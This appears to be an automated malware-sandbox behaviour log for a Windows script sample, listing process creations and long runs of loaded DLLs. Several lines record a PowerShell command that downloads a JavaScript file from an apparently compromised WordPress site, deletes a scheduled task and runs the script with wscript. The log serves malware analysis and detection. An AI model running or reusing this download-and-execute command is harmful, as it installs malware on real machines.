      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
